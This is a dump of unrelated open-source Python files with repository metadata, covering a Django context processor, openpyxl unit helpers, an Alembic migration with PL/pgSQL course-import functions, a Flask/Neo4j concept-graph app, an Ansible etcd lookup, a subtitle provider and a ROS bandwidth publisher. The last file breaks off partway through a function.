for word, suffix, expected in failed:
print 'add_suffix(%s, %s) is %s not %s' % (word, suffix, add_suffix(word, suffix),expected)
self.assertEqual(len(failed), 0)
if __name__ == '__main__':
unittest.main()
|
blockbomb/plover
|
plover/test_orthography.py
|
Python
|
gpl-2.0
| 4,487
|
def ga_key(request):
from django.conf import settings
return {'ga_key': settings.GOOGLE_ANALYTICS_KEY}
|
mrpindo/openshift-estore
|
tokoku/tokoku/context_processors.py
|
Python
|
gpl-2.0
| 111
|
# file openpyxl/shared/units.py
# Copyright (c) 2010-2011 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: see AUTHORS file
import math
def pixels_to_EMU(value):
return int(round(value * 9525))
def EMU_to_pixels(value):
if not value:
return 0
else:
return round(value / 9525.)
def EMU_to_cm(value):
if not value:
return 0
else:
return (EMU_to_pixels(value) * 2.57 / 96)
def pixels_to_points(value):
return value * 0.67777777
def points_to_pixels(value):
if not value:
return 0
else:
return int(math.ceil(value * 1.333333333))
def degrees_to_angle(value):
return int(round(value * 60000))
def angle_to_degrees(value):
if not value:
return 0
else:
return round(value / 60000.)
def short_color(color):
""" format a color to its short size """
if len(color) > 6:
return color[2:]
else:
return color
|
sbhowmik7/PSSEcompare
|
ext_libs/openpyxl/shared/units.py
|
Python
|
gpl-3.0
| 2,039
|
from .image import Image
from .product_category import ProductCategory
from .supplier import Supplier, PaymentMethod
from .product import Product
from .product import ProductImage
from .enum_values import EnumValues
from .related_values import RelatedValues
from .customer import Customer
from .expense import Expense
from .incoming import Incoming
from .shipping import Shipping, ShippingLine
from .receiving import Receiving, ReceivingLine
from .inventory_transaction import InventoryTransaction, InventoryTransactionLine
from .purchase_order import PurchaseOrder, PurchaseOrderLine
from .sales_order import SalesOrder, SalesOrderLine
from .user import User
from .role import Role, roles_users
from .organization import Organization
from .inventory_in_out_link import InventoryInOutLink
from .aspects import update_menemonic
from .product_inventory import ProductInventory
|
betterlife/psi
|
psi/app/models/__init__.py
|
Python
|
mit
| 875
|
"""update db functions
Revision ID: 8a786f9bf241
Revises: 0c2ff8b95c98
Create Date: 2017-09-27 00:11:13.429144
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '8a786f9bf241'
down_revision = '0c2ff8b95c98'
branch_labels = None
depends_on = None
def upgrade():
conn = op.get_bind()
conn.execute('drop function if exists update_courses(numeric, jsonb)')
conn.execute(sa.text("""create or replace function update_departments(_university_id numeric, _json jsonb)
returns numeric as $func$
declare
_s_id numeric;
_d_id numeric;
_count numeric := 0;
_abbr varchar;
_name varchar;
_school varchar;
begin
for _abbr, _name, _school in
select
department ->> 'value' as _abbr,
(regexp_matches(department ->> 'label', '.+(?=\()')) [1] as _name,
department ->> 'school' as _school
from jsonb_array_elements(_json -> 'departments') department
loop
-- get the school id
select id
into _s_id
from schools
where abbreviation = _school and university_id = _university_id;
-- get the department id if it exists
select id
into _d_id
from departments
where school_id = _s_id and abbreviation = _abbr;
-- if department does not exist, create it
if _d_id is null
then
insert into departments (abbreviation, name, school_id) values (_abbr, _name, _s_id);
end if;
_count = _count + 1;
end loop;
return _count;
end;
$func$ language plpgsql;"""))
conn.execute(sa.text("""create or replace function update_courses(_university_id numeric, _json jsonb)
returns numeric as $func$
declare
_d_id numeric;
_c_id numeric;
_p_id numeric;
_quarter numeric;
_latest_quarter numeric;
_s_id numeric;
_department varchar;
_number varchar;
_title varchar;
_professor1 varchar[];
_professor2 varchar[];
_professor3 varchar[];
_professors varchar[][];
_professor varchar[];
_count numeric := 0;
_new_course boolean := false;
begin
for
_quarter,
_department,
_number,
_title,
_professor1,
_professor2,
_professor3
in
select
(course ->> 'term')::int as _quarter,
course ->> 'subject' as _department,
course ->> 'catalog_nbr' as _number,
course ->> 'class_descr' as _title,
-- prof #1
case
when (course ->> 'instr_1') like '%, %' then
array[
split_part(course ->> 'instr_1', ', ', 1),
split_part(course ->> 'instr_1', ', ', 2)
]
when (course ->> 'instr_1') = '' then
null
end as _professor1,
-- prof #2
case
when (course ->> 'instr_2') like '%, %' then
array[
split_part(course ->> 'instr_2', ', ', 1),
split_part(course ->> 'instr_2', ', ', 2)
]
when (course ->> 'instr_2') = '' then
null
end as _professor2,
-- prof #3
case
when (course ->> 'instr_3') like '%, %' then
array[
split_part(course ->> 'instr_3', ', ', 1),
split_part(course ->> 'instr_3', ', ', 2)
]
when (course ->> 'instr_3') = '' then
null
end as _professor3
from jsonb_array_elements(_json -> 'courses') course
loop
if _professor1 is null then continue; end if;
-- get the department id (assume it exists)
select departments.id into _d_id
from departments
where abbreviation = _department
order by school_id limit 1;
-- get the course id if it exists
select id into _c_id
from courses
where department_id = _d_id and number = _number;
-- if the course does not exist, create it
if _c_id is null then
insert into courses (department_id, number, title) values (_d_id, _number, _title)
returning id into _c_id;
_new_course = true;
end if;
-- get the section id if it exists
select id into _s_id
from sections
where quarter_id = _quarter and course_id = _c_id;
-- if the section does not exist, create it
if _s_id is null then
insert into sections (quarter_id, course_id) values (_quarter, _c_id)
returning id into _s_id;
end if;
_professors = array[_professor1];
if _professor2 is not null then _professors = array_cat(_professors, _professor2); end if;
if _professor3 is not null then _professors = array_cat(_professors, _professor3); end if;
foreach _professor slice 1 in array _professors
loop
if _professor[1] is null then continue; end if;
-- get the professor id if it exists
select id into _p_id
from professors
where last_name = _professor[2] and first_name = _professor[1];
-- if the professor does not exist, create it
if _p_id is null then
insert into professors (first_name, last_name, university_id)
values (_professor[1], _professor[2], _university_id)
returning id into _p_id;
end if;
-- check if the professer is listed under this section
if not exists(select 1
from section_professor sp
where sp.section_id = _s_id and sp.professor_id = _p_id)
then
insert into section_professor (section_id, professor_id) values (_s_id, _p_id);
end if;
end loop;
-- if the course existed, make sure the title is up to date
if not _new_course then
-- get the latest quarter which the course was offered in
select q.id into _latest_quarter
from quarters q
join sections s on q.id = s.quarter_id
join courses c on s.course_id = c.id
where c.id = _c_id and q.university_id = _university_id
order by lower(period) desc
limit 1;
-- if this course info is for the latest quarter, update the title
if _quarter = _latest_quarter then
update courses
set title = _title
where id = _c_id;
end if;
end if;
_count = _count + 1;
end loop;
return _count;
end;
$func$ language plpgsql;"""))
def downgrade():
pass
|
SCUEvals/scuevals-api
|
db/alembic/versions/20170927001113_update_db_functions.py
|
Python
|
agpl-3.0
| 6,092
|
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Sylvain Boily
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from xivo_confd import BasePlugin
from popc_stats.database import create_db
from popc_stats.config import init_config
from views import popc
class XiVOPopcStats(BasePlugin):
def load(self, app, config):
config_popc = init_config()
db_session = create_db(config_popc)
app.register_blueprint(popc)
|
sboily/xivo-popc-stats
|
popc_stats/plugins/popcstats/load.py
|
Python
|
gpl-3.0
| 1,022
|
# coding: utf-8
"""
Command Wrapper.
A command wrapper to get a live output displayed.
"""
import subprocess
import sys
from io import BufferedReader
from click import echo, style
def launch_cmd_displays_output(cmd: list, print_msg: bool = True, print_err: bool = True,
err_to_out: bool = False):
"""Launch a command and displays conditionally messages and / or errors."""
try:
stderr = subprocess.PIPE if err_to_out is False else subprocess.STDOUT
result = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=stderr)
except Exception as error:
raise SystemError('Cannot run the command: {}'.format(error))
_read_messages(result, print_msg)
if print_err is True and err_to_out is False:
_print_errors(result)
return result
def verbose(display: bool, message: str):
"""Display a message if verbose is On."""
if display is True:
echo(style('[VERBOSE]', fg='green') +
' {}'.format(message), file=sys.stderr)
def _read_messages(result: BufferedReader, display: bool = False):
"""Print messages sent to the STDOUT."""
for line in result.stdout:
line = line.decode()
line = line if display is True else '.'
print(line, end='')
sys.stdout.flush()
print()
def _print_errors(result: BufferedReader):
"""Print messages sent to the STDERR."""
num = 0
for line in result.stderr:
err = line.decode()
if num == 0:
print(style("Command returned errors :", fg='red'))
if num < 5:
print(err, end='')
elif num == 5:
print(style('... and more', fg='red'))
num += 1
|
edyan/stakkr
|
stakkr/command.py
|
Python
|
apache-2.0
| 1,711
|
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# Standard Library
import logging
# Third Party
from rest_framework.authtoken.models import Token
logger = logging.getLogger(__name__)
def create_token(user, force_new=False):
"""
Creates a new token for a user or returns the existing one.
:param user: User object
:param force_new: forces creating a new token
"""
token = False
try:
token = Token.objects.get(user=user)
except Token.DoesNotExist:
force_new = True
if force_new:
if token:
token.delete()
token = Token.objects.create(user=user)
return token
|
rolandgeider/wger
|
wger/utils/api_token.py
|
Python
|
agpl-3.0
| 1,240
|
import json
import os.path
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../scripts'))
from flask import Flask, render_template, request
from py2neo import neo4j
from ollie import pipeline
app = Flask(__name__)
"""@app.route('/render', method=['POST'])
def render():
pairs = json.loads(request.form['data'])
edges = []
for pair in pairs:
n1 = pair[0]
n2 = pair[2]
rel = pair[1]
edges.append({'source': str(n1), 'target': str(n2), 'type': str(rel)})
return render_template('index4.html', links=edges)
"""
@app.route('/graph', methods=['POST', 'GET'])
def graph():
if request.method == 'POST':
f = request.files['file']
f.save('/tmp/doc.txt')
pairs = pipeline('/tmp/doc.txt')
edges = []
for pair in pairs:
n1 = pair[0]
n2 = pair[2]
rel = pair[1]
edges.append({'source': str(n1), 'target': str(n2), 'type': str(rel)})
#return render_template('graph.html', links=edges)
return json.dumps(edges)
else:
graph_db = neo4j.GraphDatabaseService('http://localhost:7474/db/data/')
relations = graph_db.get_index(neo4j.Relationship, 'relations')
q = relations.query('relation_name:*')
pairs = []
for rel in q:
pairs.append([rel.start_node['name'], rel.type, rel.end_node['name']])
return json.dumps(pairs)
@app.route('/graph/<concept>')
def concept(concept):
graph_db = neo4j.GraphDatabaseService('http://localhost:7474/db/data/')
relations = graph_db.get_index(neo4j.Node, 'concepts')
q = relations.query('concept_name:%s' % concept)
pairs = []
try:
concept = q.next()
except:
return json.dumps(pairs)
rels = concept.match()
for rel in rels:
pairs.append([rel.start_node['name'], rel.type, rel.end_node['name']])
return json.dumps(pairs)
@app.route('/search/<query>')
def search(query):
graph_db = neo4j.GraphDatabaseService('http://localhost:7474/db/data/')
concepts = graph_db.get_index(neo4j.Node, 'concepts')
query = '*' + '*'.join(query.strip().split(' ')) + '*'
print query
q = concepts.query('concept_name:%s' % str(query))
pairs = []
try:
concept = q.next()
except:
return json.dumps(pairs)
rels = concept.match()
for rel in rels:
pairs.append([rel.start_node['name'], rel.type, rel.end_node['name']])
return json.dumps(pairs)
@app.route('/graphical/<concepts>')
def graphical(concepts):
graph_db = neo4j.GraphDatabaseService('http://localhost:7474/db/data/')
relations = graph_db.get_index(neo4j.Node, 'concepts')
query = '"' + '" OR "'.join(concepts.split(',')) + '"'
q = relations.query('concept_name:(%s)' % str(query))
pairs = []
rels = []
concept = None
while True:
try:
concept = q.next()
except:
break
rels += concept.match()
if not concept:
return json.loads(pairs)
nodes = {}
edges = []
for rel in rels:
n1 = rel.start_node['name']
n2 = rel.end_node['name']
if n1 not in nodes:
nodes[str(n1)] = {"radius":10.0, "weight":1.00, "centrality":0.00, "fill":"rgba(0,127,255,0.70)", "stroke":"rgba(0,0,0,0.80)"}
if n2 not in nodes:
nodes[str(n2)] = {"radius":10.0, "weight":1.00, "centrality":0.00, "fill":"rgba(0,127,255,0.70)", "stroke":"rgba(0,0,0,0.80)"}
nodes[str(rel.type)] = {"radius":10.0, "weight":1.00, "centrality":0.00, "fill":"rgba(0,127,255,0.70)", "stroke":"rgba(0,0,0,0.80)"}
#edges.append([str(n1), str(rel.type), {"length":50.00, "stroke":"rgba(135,234,135,1.00)"}])
#edges.append([str(rel.type), str(n2), {"length":50.00, "stroke":"rgba(135,234,135,1.00)"}])
edges.append({'source': str(n1), 'target': str(n2), 'type': str(rel.type)})
return render_template('graph.html', links=edges, nodes=nodes)
@app.route('/')
def home():
return render_template('new.html')
@app.route('/browse')
def browse():
concepts = []
graph_db = neo4j.GraphDatabaseService('http://localhost:7474/db/data/')
relations = graph_db.get_index(neo4j.Node, 'concepts')
q = relations.query('concept_name:*')
while True:
try:
concept = q.next()
concepts.append(str(concept['name']))
except:
break
return render_template('browse.html', concepts=concepts)
app.debug = True
app.run()
|
dash1291/major
|
webserver/app.py
|
Python
|
gpl-3.0
| 4,561
|
#!/usr/bin/python
from pisi.actionsapi import shelltools, get, autotools, pisitools
def setup():
autotools.configure ("--disable-debugging \
--disable-static")
def build():
autotools.make ()
def install():
autotools.install ()
pisitools.dodoc ("COPYING")
|
richard-fisher/repository
|
multimedia/codecs/libmad/actions.py
|
Python
|
gpl-2.0
| 325
|
#!/usr/bin/python
import numpy
from paths.svms import mfeavg200, mfestd200, efeavg200, efestd200
from sequence.rna_tools import RNAFolder
from sequence.seq_tools import kContent
from libsvm import svmutil
FOLDER = RNAFolder(p=True)
def loadRange(fname):
avgs = []
stds = []
with open(fname, encoding='utf-8') as fileobj:
for line in fileobj:
avg, std = line.strip().split()
avgs.append(avg)
stds.append(std)
return numpy.array(avgs, dtype=numpy.float32), numpy.array(stds, dtype=numpy.float32)
def calcFtrs(seq):
ftrs = []
stc, mfe, efe, cstc, cmfe, cdst, frq, div, bpp = FOLDER.fold(seq)
kmer = kContent(seq, 1)
atcg = (kmer['a'] + kmer['t']) / (kmer['a'] + kmer['t'] + kmer['c'] + kmer['g'])
if kmer['a'] + kmer['t'] == 0:
at = 0
else:
at = kmer['a'] / (kmer['a'] + kmer['t'])
if kmer['c'] + kmer['g'] == 0:
cg = 0
else:
cg = kmer['c'] / (kmer['c'] + kmer['g'])
svmftrs = numpy.array((atcg, at, cg))
mfeavg_mdl = svmutil.svm_load_model(mfeavg200)
mfestd_mdl = svmutil.svm_load_model(mfestd200)
efeavg_mdl = svmutil.svm_load_model(efeavg200)
# efestd_mdl = svmutil.svm_load_model(efestd200)
mfeavg_avg, mfeavg_std = loadRange(mfeavg200 + '.rng')
mfestd_avg, mfestd_std = loadRange(mfestd200 + '.rng')
efeavg_avg, efeavg_std = loadRange(efeavg200 + '.rng')
# efestd_avg, efestd_std = loadRange(efestd200 + '.rng')
mfe_avg = svmutil.svm_predict([0],
[((svmftrs - mfeavg_avg) / mfeavg_std).tolist()], mfeavg_mdl, options='-b 1')[0][0]
mfe_std = svmutil.svm_predict([0],
[((svmftrs - mfestd_avg) / mfestd_std).tolist()], mfestd_mdl, options='-b 1')[0][0]
efe_avg = svmutil.svm_predict([0],
[((svmftrs - efeavg_avg) / efeavg_std).tolist()], efeavg_mdl, options='-b 1')[0][0]
# efe_std = svmutil.svm_predict([0],
# [((svmftrs - efestd_avg) / efestd_std).tolist()], efestd_mdl, options='-b 1')[0][0]
ftrs.append(mfe - mfe_avg)
ftrs.append((mfe - mfe_avg) / mfe_std)
ftrs.append(efe - efe_avg)
# ftrs.append((efe - efe_avg) / efe_std)
return numpy.array(ftrs)
def nameFtrs():
ftrs = []
ftrs.append('Generated MFE')
ftrs.append('Generated MFEz')
ftrs.append('Generated EFE')
# ftrs.append('Generated EFEz')
return ftrs
def main(argv):
from Bio import SeqIO
with open(argv[2], 'w') as fileobj:
fileobj.write('\t'.join(nameFtrs()))
fileobj.write('\n')
for ent in SeqIO.parse(argv[1], 'fasta'):
fileobj.write('\t'.join('%.3f' % ftr for ftr in calcFtrs(str(ent.seq))))
fileobj.write('\n')
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
|
childsish/lhc-python
|
lhc/binf/feature/gen.py
|
Python
|
gpl-2.0
| 2,853
|
# (c) 2013, Jan-Piet Mens <jpmens(at)gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
try:
import json
except ImportError:
import simplejson as json
from ansible.plugins.lookup import LookupBase
from ansible.module_utils.urls import open_url
# this can be made configurable, not should not use ansible.cfg
ANSIBLE_ETCD_URL = 'http://127.0.0.1:4001'
if os.getenv('ANSIBLE_ETCD_URL') is not None:
ANSIBLE_ETCD_URL = os.environ['ANSIBLE_ETCD_URL']
class Etcd:
def __init__(self, url=ANSIBLE_ETCD_URL, validate_certs=True):
self.url = url
self.baseurl = '%s/v1/keys' % (self.url)
self.validate_certs = validate_certs
def get(self, key):
url = "%s/%s" % (self.baseurl, key)
data = None
value = ""
try:
r = open_url(url, validate_certs=self.validate_certs)
data = r.read()
except:
return value
try:
# {"action":"get","key":"/name","value":"Jane Jolie","index":5}
item = json.loads(data)
if 'value' in item:
value = item['value']
if 'errorCode' in item:
value = "ENOENT"
except:
raise
pass
return value
class LookupModule(LookupBase):
def run(self, terms, variables, **kwargs):
if isinstance(terms, basestring):
terms = [ terms ]
validate_certs = kwargs.get('validate_certs', True)
etcd = Etcd(validate_certs=validate_certs)
ret = []
for term in terms:
key = term.split()[0]
value = etcd.get(key)
ret.append(value)
return ret
|
krishnazure/ansible
|
lib/ansible/plugins/lookup/etcd.py
|
Python
|
gpl-3.0
| 2,396
|
#!/usr/bin/env python3
import asyncio
import os
from datetime import datetime
import aiohttp
from aiohttp import web
from raven import Client
from restaurants import (FormattedMenus, SafeRestaurant, OtherRestaurant,
AvalonRestaurant, TOTORestaurant, TOTOCantinaRestaurant,
CasaInkaRestaurant, OlivaRestaurant, CityCantinaRosumRestaurant)
from slack import Channel
# SLACK_HOOK = 'https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX'
SLACK_HOOK = os.environ.get('SLACK_HOOK', None)
SLACK_CHANNEL = os.environ.get('SLACK_CHANNEL', None)
SECRET_KEY = os.environ.get('SECRET_KEY', None)
DEBUG = bool(os.environ.get('DEBUG', False))
def is_work_day():
return datetime.today().weekday() in range(0, 5)
def should_send_to_slack(secret_key):
return SLACK_HOOK and secret_key == SECRET_KEY
async def retrieve_menus(session):
futures = [
SafeRestaurant(TOTORestaurant(session)).retrieve_menu(),
SafeRestaurant(TOTOCantinaRestaurant(session)).retrieve_menu(),
SafeRestaurant(AvalonRestaurant(session)).retrieve_menu(),
SafeRestaurant(OlivaRestaurant(session)).retrieve_menu(),
SafeRestaurant(CasaInkaRestaurant(session)).retrieve_menu(),
SafeRestaurant(CityCantinaRosumRestaurant(session)).retrieve_menu(),
]
# Add list of other restaurants first, will be in header.
menus = [await SafeRestaurant(OtherRestaurant()).retrieve_menu()]
for future in asyncio.as_completed(futures):
menus.append(await future)
return menus
async def index(request):
if is_work_day():
async with aiohttp.ClientSession() as session:
menus = FormattedMenus(await retrieve_menus(session))
secret_key = request.match_info.get('secret_key')
if should_send_to_slack(secret_key):
await Channel(SLACK_HOOK, session).send(menus)
return web.Response(text=str(menus))
return web.Response(text='Come on Monday-Friday')
sentry_client = Client() # credentials is taken from environment variable SENTRY_DSN
app = web.Application(debug=True)
app.router.add_get('/', index)
app.router.add_get('/{secret_key}', index)
if __name__ == '__main__':
web.run_app(app, host='localhost', port=5000)
|
fadawar/infinit-lunch
|
main.py
|
Python
|
gpl-3.0
| 2,316
|
# -*- coding: utf-8 -*-
import io
import logging
import re
from babelfish import Language, language_converters
from guessit import guessit
try:
from lxml import etree
except ImportError:
try:
import xml.etree.cElementTree as etree
except ImportError:
import xml.etree.ElementTree as etree
from requests import Session
from zipfile import ZipFile
from . import Provider
from .. import __short_version__
from ..exceptions import ProviderError
from ..subtitle import Subtitle, fix_line_ending, guess_matches
from ..video import Episode, Movie, sanitize
logger = logging.getLogger(__name__)
class PodnapisiSubtitle(Subtitle):
provider_name = 'podnapisi'
def __init__(self, language, hearing_impaired, page_link, pid, releases, title, season=None, episode=None,
year=None):
super(PodnapisiSubtitle, self).__init__(language, hearing_impaired, page_link)
self.pid = pid
self.releases = releases
self.title = title
self.season = season
self.episode = episode
self.year = year
@property
def id(self):
return self.pid
def get_matches(self, video):
matches = set()
# episode
if isinstance(video, Episode):
# series
if video.series and sanitize(self.title) == sanitize(video.series):
matches.add('series')
# year
if video.original_series and self.year is None or video.year and video.year == self.year:
matches.add('year')
# season
if video.season and self.season == video.season:
matches.add('season')
# episode
if video.episode and self.episode == video.episode:
matches.add('episode')
# guess
for release in self.releases:
matches |= guess_matches(video, guessit(release, {'type': 'episode'}))
# movie
elif isinstance(video, Movie):
# title
if video.title and sanitize(self.title) == sanitize(video.title):
matches.add('title')
# year
if video.year and self.year == video.year:
matches.add('year')
# guess
for release in self.releases:
matches |= guess_matches(video, guessit(release, {'type': 'movie'}))
return matches
class PodnapisiProvider(Provider):
languages = ({Language('por', 'BR'), Language('srp', script='Latn')} |
{Language.fromalpha2(l) for l in language_converters['alpha2'].codes})
server_url = 'http://podnapisi.eu/subtitles/'
def initialize(self):
self.session = Session()
self.session.headers['User-Agent'] = 'Subliminal/%s' % __short_version__
def terminate(self):
self.session.close()
def query(self, language, keyword, season=None, episode=None, year=None):
# set parameters, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164#p212652
params = {'sXML': 1, 'sL': str(language), 'sK': keyword}
is_episode = False
if season and episode:
is_episode = True
params['sTS'] = season
params['sTE'] = episode
if year:
params['sY'] = year
# loop over paginated results
logger.info('Searching subtitles %r', params)
subtitles = []
pids = set()
while True:
# query the server
xml = etree.fromstring(self.session.get(self.server_url + 'search/old', params=params, timeout=10).content)
# exit if no results
if not int(xml.find('pagination/results').text):
logger.debug('No subtitles found')
break
# loop over subtitles
for subtitle_xml in xml.findall('subtitle'):
# read xml elements
language = Language.fromietf(subtitle_xml.find('language').text)
hearing_impaired = 'n' in (subtitle_xml.find('flags').text or '')
page_link = subtitle_xml.find('url').text
pid = subtitle_xml.find('pid').text
releases = []
if subtitle_xml.find('release').text:
for release in subtitle_xml.find('release').text.split():
release = re.sub(r'\.+$', '', release) # remove trailing dots
release = ''.join(filter(lambda x: ord(x) < 128, release)) # remove non-ascii characters
releases.append(release)
title = subtitle_xml.find('title').text
season = int(subtitle_xml.find('tvSeason').text)
episode = int(subtitle_xml.find('tvEpisode').text)
year = int(subtitle_xml.find('year').text)
if is_episode:
subtitle = PodnapisiSubtitle(language, hearing_impaired, page_link, pid, releases, title,
season=season, episode=episode, year=year)
else:
subtitle = PodnapisiSubtitle(language, hearing_impaired, page_link, pid, releases, title,
year=year)
# ignore duplicates, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164&start=10#p213321
if pid in pids:
continue
logger.debug('Found subtitle %r', subtitle)
subtitles.append(subtitle)
pids.add(pid)
# stop on last page
if int(xml.find('pagination/current').text) >= int(xml.find('pagination/count').text):
break
# increment current page
params['page'] = int(xml.find('pagination/current').text) + 1
logger.debug('Getting page %d', params['page'])
return subtitles
def list_subtitles(self, video, languages):
if isinstance(video, Episode):
return [s for l in languages for s in self.query(l, video.series, season=video.season,
episode=video.episode, year=video.year)]
elif isinstance(video, Movie):
return [s for l in languages for s in self.query(l, video.title, year=video.year)]
def download_subtitle(self, subtitle):
# download as a zip
logger.info('Downloading subtitle %r', subtitle)
r = self.session.get(self.server_url + subtitle.pid + '/download', params={'container': 'zip'}, timeout=10)
r.raise_for_status()
# open the zip
with ZipFile(io.BytesIO(r.content)) as zf:
if len(zf.namelist()) > 1:
raise ProviderError('More than one file to unzip')
subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
|
pedro2d10/SickRage-FR
|
lib/subliminal/providers/podnapisi.py
|
Python
|
gpl-3.0
| 6,891
|
from . import recipeMergerPlugin
plugins = [
recipeMergerPlugin.RecipeMergerPlugin,
recipeMergerPlugin.RecipeMergerImportManagerPlugin
]
|
kirienko/gourmet
|
src/gourmet/plugins/duplicate_finder/__init__.py
|
Python
|
gpl-2.0
| 150
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-24 21:48
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
|
jojoriveraa/titulacion-NFCOW
|
NFCow/users/migrations/0002_auto_20151224_2148.py
|
Python
|
apache-2.0
| 487
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VaultSecretGroup(Model):
"""Describes a set of certificates which are all in the same Key Vault.
:param source_vault: The Relative URL of the Key Vault containing all of
the certificates in VaultCertificates.
:type source_vault: :class:`SubResource
<azure.mgmt.compute.compute.v2015_06_15.models.SubResource>`
:param vault_certificates: The list of key vault references in SourceVault
which contain certificates.
:type vault_certificates: list of :class:`VaultCertificate
<azure.mgmt.compute.compute.v2015_06_15.models.VaultCertificate>`
"""
_attribute_map = {
'source_vault': {'key': 'sourceVault', 'type': 'SubResource'},
'vault_certificates': {'key': 'vaultCertificates', 'type': '[VaultCertificate]'},
}
def __init__(self, source_vault=None, vault_certificates=None):
self.source_vault = source_vault
self.vault_certificates = vault_certificates
|
SUSE/azure-sdk-for-python
|
azure-mgmt-compute/azure/mgmt/compute/compute/v2015_06_15/models/vault_secret_group.py
|
Python
|
mit
| 1,462
|
#!/usr/bin/env python
import rospy
import math
import random
from std_msgs.msg import String
import sys
import array
pub = None
# not truly implemented yet.
# def floored_abs():
# counter = 1
# step_size = 5000
# maximum = 20000
# distance = maximum - counter
# duration = rospy.get_param("~duration", 10)
# time_step = distance / duration
# direction = 1
# while not rospy.is_shutdown():
# c = math.floor(counter / step_size) + 1
# counter += direction * time_step
# if counter >= maximum:
# direction = -1
# if direction < 0 and counter == 1:
# direction = 1
# c *= 1000
# print(c)
# pub.publish(
# ("%s times, " % int(c)) + "publishing with floored_abs. " * int(c))
# rospy.Rate(rospy.get_param("~frequency", 10)).sleep()
# def linear_abs():
# counter = 1
# maximum = 20000
# distance = maximum - counter
# duration = rospy.get_param("~duration", 10)
# time_step = distance / duration
# direction = 1
# while not rospy.is_shutdown():
# counter += direction * time_step
# print(counter)
# if counter >= maximum:
# direction = -1
# if direction < 0 and counter == 1:
# direction = 1
# pub.publish(("%s times, " % int(math.floor(counter))) +
# "publishing with linear_abs. " * int(math.floor(counter)))
# rospy.Rate(rospy.get_param("~frequency", 10)).sleep()
# def sawtooth():
# high = rospy.get_param("~bandwidth_high", 200)
# low = rospy.get_param("~bandwidth_low", 1)
# distance = high - low
# steps = rospy.get_param("~steps", distance)
# step = distance / steps
# counter = 1
# while not rospy.is_shutdown():
# pub.publish("publishing with sawtooth. " * int(counter))
# counter += step
# if counter >= high:
# counter = 1
# rospy.Rate(rospy.get_param("~frequency", 10)).sleep()
def sine():
frequency = rospy.get_param("~frequency", 10)
rate = rospy.Rate(frequency)
mid = rospy.get_param("~bandwidth_mid", 1024) / frequency
var = rospy.get_param("~bandwidth_variation", 500) / frequency
# period normalised to
period = rospy.get_param("~period", 30)
begin = rospy.Time.now()
while not rospy.is_shutdown():
cur = rospy.Time.now() - begin
fluctuation = math.sin(2 * math.pi / period * cur.to_sec()) * var
msgsize = mid + fluctuation
pub.publish("." * int(msgsize))
rate.sleep()
def constant():
frequency = rospy.get_param("~frequency", 1000)
rate = rospy.Rate(frequency)
bandwidth = rospy.get_param("~bandwidth", 1024 * 1024)
msg = "." * (bandwidth / frequency)
while not rospy.is_shutdown():
pub.publish(msg)
rate.sleep()
def high_low():
frequency = rospy.get_param("~frequency", 10)
rate = rospy.Rate(frequency)
